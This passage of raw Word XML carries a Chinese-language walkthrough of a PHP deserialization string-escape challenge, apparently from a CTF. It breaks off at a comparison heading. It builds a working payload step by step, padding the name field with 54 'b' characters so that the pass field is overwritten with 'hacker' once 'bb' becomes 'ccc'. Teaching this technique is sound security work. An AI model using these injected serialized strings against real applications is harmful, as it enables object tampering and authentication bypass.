      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    public $name='12';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1229F8B9" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    public $pass='21';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F379564" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426B0268" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E482AF9" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$o = new A();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5481B" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRPr="00F77459" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>echo serialize($o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4DF942" w14:textId="4CCC0FBF" w:rsidR="00F5193C" w:rsidRPr="00F5193C" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E2170" w14:textId="77777777" w:rsidR="00F5193C" w:rsidRDefault="00F5193C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2269E028" w14:textId="7788EF02" w:rsidR="00F5193C" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF8529" w14:textId="7292BF4E" w:rsidR="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>O:1:"A":2:{s:4:"name";s:2:"12";s:4:"pass";s:2:"21";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5399F5E3" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ACF6E40" w14:textId="0E92E548" w:rsidR="00F86AC4" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造最终的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pa</w:t>
      </w:r>
      <w:r w:rsidR="001035A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9ABCF" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6BF7D3" w14:textId="10A124F2" w:rsidR="00F86AC4" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为我们构造的这部分代码会被“少变多”顶出去，因此我们从被构造变量的上一个变量的变量值的右引号起开始构造，构造如下这部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FDBD08" w14:textId="02D70F80" w:rsidR="00F86AC4" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:t>O:1:"A":2:{s:4:"name";s:2:"12</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:2:"21";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04976902" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E5FA06" w14:textId="3766B79F" w:rsidR="00F86AC4" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构造为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A6877B" w14:textId="078815E5" w:rsidR="00F77459" w:rsidRPr="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:6:"hacker";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2EC3D7" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02EA3E70" w14:textId="08333ED9" w:rsidR="00F86AC4" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="7"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算溢出位移</w:t>
      </w:r>
      <w:r w:rsidR="006555F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，构造</w:t>
      </w:r>
      <w:r w:rsidR="006555F7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CDB293" w14:textId="2185F952" w:rsidR="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从上一步已构造得到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3065C9B3" w14:textId="77777777" w:rsidR="00F77459" w:rsidRPr="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:6:"hacker";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADCD734" w14:textId="77777777" w:rsidR="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DE3B1E2" w14:textId="5C7AA857" w:rsidR="00F77459" w:rsidRPr="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>计算长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>len('</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:6:"hacker";}</w:t>
      </w:r>
      <w:r>
        <w:t>')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，得其长度为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBFC9EE" w14:textId="77777777" w:rsidR="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D977D22" w14:textId="2A2BAA46" w:rsidR="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已知题目是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:t>'bb'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:t xml:space="preserve"> 'ccc'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>2-&gt;3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，一对的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>长度差值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0C5426" w14:textId="02B132B3" w:rsidR="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了顶出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我们则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1 == 27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:t>'bb'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变</w:t>
      </w:r>
      <w:r w:rsidRPr="00F77459">
        <w:t xml:space="preserve"> 'ccc'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00027FB3" w14:textId="77777777" w:rsidR="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9AF11C" w14:textId="2C3BDB42" w:rsidR="00F77459" w:rsidRPr="0051456F" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从第一步得到的字符串，直接删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的变量值中原有字符串（即原有的“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”这种占位字符），</w:t>
      </w:r>
      <w:r w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>填写</w:t>
      </w:r>
      <w:r w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0051456F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="0051456F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bb'</w:t>
      </w:r>
      <w:r w:rsidR="0051456F" w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（即</w:t>
      </w:r>
      <w:r w:rsidR="0051456F" w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="0051456F" w:rsidRPr="0051456F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="0051456F" w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidR="0051456F" w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="0051456F" w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和我们构造后的</w:t>
      </w:r>
      <w:r w:rsidRPr="0051456F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A286906" w14:textId="77777777" w:rsidR="00F77459" w:rsidRPr="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DDA4D3" w14:textId="4F35F183" w:rsidR="00F77459" w:rsidRPr="0051456F" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F77459">
        <w:t>O:1:"A":2:{s:4:"name";s:2:"</w:t>
      </w:r>
      <w:r w:rsidR="0051456F" w:rsidRPr="0051456F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";s:4:"pass";s:6:"hacker";}</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3520">
        <w:rPr>
          <w:color w:val="7030A0"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>";s:4:"pass";s:2:"21";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F921D01" w14:textId="77777777" w:rsidR="00F77459" w:rsidRDefault="00F77459" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F391938" w14:textId="6C30D8C6" w:rsidR="00F77459" w:rsidRDefault="00BD3520" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，黄底红字是我们拼上去的，灰底紫字在未来将会被顶出去，实际作废。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527444D3" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66BF4AF9" w14:textId="2A2F6CA6" w:rsidR="00F86AC4" w:rsidRDefault="00BD3520" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后不要忘了修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量值的长度，题目会将这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>替换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ccc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个长度的字符值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FE33F" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42F3EDCF" w14:textId="31DC97D6" w:rsidR="00BD3520" w:rsidRDefault="00BD3520" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，我们需要修改字符串长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3520">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>81</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE86145" w14:textId="77777777" w:rsidR="00F86AC4" w:rsidRDefault="00F86AC4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5589AAB7" w14:textId="7CDA8AB8" w:rsidR="00BD3520" w:rsidRDefault="00BD3520" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00BD3520">
        <w:t>O:1:"A":2:{s:4:"name";s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3520">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>81</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3520">
        <w:t>:"bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";s:4:"pass";s:6:"hacker";}";s:4:"pass";s:2:"21";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E80A28" w14:textId="77777777" w:rsidR="00BD3520" w:rsidRDefault="00BD3520" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743F4F92" w14:textId="7193B6E3" w:rsidR="00BD3520" w:rsidRDefault="003C4B61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传输此字符串，则成功结束。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766AB70F" w14:textId="2456D4BC" w:rsidR="003C4B61" w:rsidRDefault="003C4B61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，反序列化后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>s:6:"hacker"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F36471A" w14:textId="77777777" w:rsidR="003C4B61" w:rsidRDefault="003C4B61" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54FA9C02" w14:textId="6A4306BE" w:rsidR="004835FF" w:rsidRDefault="004835FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比对如下：</w:t>
      </w:r>
    </w:p>
